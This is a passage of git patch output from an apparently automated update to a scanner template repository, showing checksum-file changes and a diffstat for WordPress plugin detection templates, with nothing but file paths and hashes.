+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b +http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 +http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 +http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e +http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c +http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 +http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 +http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 +http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 +http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b +http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea +http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d +http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd +http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f +http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 +http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 +http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e +http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 +http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50 +http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f +http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 +http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 +http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 +http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 +http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 +http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47 -http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c -http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d -http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 -http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e -http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 -http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 -http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 -http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 -http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 -http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd -http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 -http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5 +http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f +http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 +http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a +http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa +http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da +http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 +http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad +http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 +http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 +http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 +http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf +http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd -http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c +http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 +http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 -http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc -http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b -http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 -http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a -http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 +http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 +http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a -http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 -http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e -http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 -http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 -http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 +http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f +http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee -http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c -http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 -http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f -http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c -http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 -http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce -http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 -http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95 -http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 +http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b -http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 -http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 -http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 -http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 -http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -7057,7 +7058,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:52aec48817e5c75e55036e918047bcc7db427e7b +templates-checksum.txt:e7b8afb1ac7b6d2345f4ab567158b60c7bab4246 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From cba02ca3bc0eda06ccecc655df86b1e172292455 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 11 Sep 2023 07:24:07 +0000 Subject: [PATCH 0278/1090] TemplateMan Update [Mon Sep 11 07:24:07 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 